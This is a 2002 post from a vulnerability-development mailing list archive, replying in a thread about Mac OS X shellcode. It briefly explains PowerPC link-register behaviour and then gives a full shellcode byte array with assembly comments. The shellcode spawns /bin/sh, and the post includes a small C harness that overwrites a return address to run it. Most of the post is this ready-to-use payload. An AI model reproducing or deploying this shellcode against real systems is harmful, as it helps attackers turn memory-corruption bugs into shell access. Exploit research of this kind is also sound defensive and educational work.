Vulnerability Development mailing list archives
Re: OS X Shell Code
From: fintler <fintler () msec net>
Date: Thu, 10 Jan 2002 16:38:54 -0500
Here's a sample of ppc shellcode (should work fine on mac os x) on ppc you have to worry about the link register having the return address, along with the copy on the stack, so it's not like you can just overwrite it like in x86. Makes it harder to overflow those off by ones I guess...this was written by someone named "Chris Shepard" I think: char shellcode[] = "\x7c\x08\x02\xa6" /* mflr r0 000 */ "\x7c\x01\x03\x78" /* mr r1,r0 004 */ "\x39\x20\x44\x01" /* li r9,17409 008 */ "\x31\x29\xff\xff" /* addic r9,r9,-1 016 */ "\x39\x40\x01\x04" /* li r10,260 020 */ "\x31\x4a\xfe\xfe" /* addic r10,r10,-258 024 */ "\x30\x41\x01\x74" /* addic r2,r1,372 028 */ "\xb1\x22\xfe\xfc" /* sth r9,-260(r2) 032 */ "\xb1\x42\xfe\xfe" /* sth r10,-258(r2) 036 */ "\x30\x41\x01\x88" /* addic r1,r1,392 040 */ "\xb1\x22\xfe\xfc" /* sth r9,-260(r2) 044 */ "\xb1\x42\xfe\xfe" /* sth r10,-258(r2) 048 */ "\x30\x21\x01\x89" /* addic r1,r1,393 052 */ "\x30\x21\xfe\xff" /* addic r1,r1,-257 056 */ "\x7c\x20\x0b\x78" /* mr r0,r1 060 */ "\x31\x01\x01\x01" /* addic r8,r1,257 064 */ "\x90\x08\xff\x07" /* stw r0,-249(r8) 068 */ "\x7c\x03\x03\x78" /* mr r3,r0 072 */ "\x30\x81\x01\x09" /* addic r4,r1,265 076 */ "\x30\x84\xfe\xff" /* addic r4,r4,-257 080 */ "\x7c\xa5\x2a\x78" /* xor r5,r5,r5 084 */ "\x7c\xc6\x32\x78" /* xor r6,r6,r6 088 */ "\x31\x01\x01\x01" /* addic r8,r1,257 092 */ "\x90\xa8\xff\x0b" /* stw r5,-245(r8) 096 */ "\x7c\xe7\x3a\x78" /* xor r7,r7,r7 100 */ "\x30\xe7\x01\x3c" /* addic r7,r7,268 104 */ "\x30\xe7\xfe\xff" /* addic r7,r7,-257 108 */ "\x7c\xe0\x3b\x78" /* mr r0,r7 112 */ "\x44\xff\xff\xff" /* sc 116 */ "\x7c\xe7\x3a\x78" /* xor r7,r7,r7 120 */ "\x30\xe7\x01\x02" /* addic r7,r7,258 124 */ "\x30\xe7\xfe\xff" /* addfic r7,r7,-257 128 */ "\x7c\xe0\x3b\x78" /* mr r0,r7 132 */ "\x44\xff\xff\xff" /* sc 136 */ "\x2f\x62\x69\x6e\x2f\x73\x68\x00"; /* /bin/sh \x00 144 */ void main() { int *ret; ret = (int *)&ret + 8; (*ret) = (int)shellcode; printf("Hi there.\n"); }
Current thread:
- OS X Shell Code Josha Bronson (Jan 10)
- Re: OS X Shell Code ghandi (Jan 10)
- <Possible follow-ups>
- Re: OS X Shell Code fintler (Jan 10)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- Re[2]: OS X Shell Code Meder Kydyraliev (Jan 10)
- Re: OS X Shell Code qobaiashi (Jan 11)
- Re: OS X Shell Code Josha Bronson (Jan 10)
- RE: OS X Shell Code Andersen, Thomas Bjoern (Jan 11)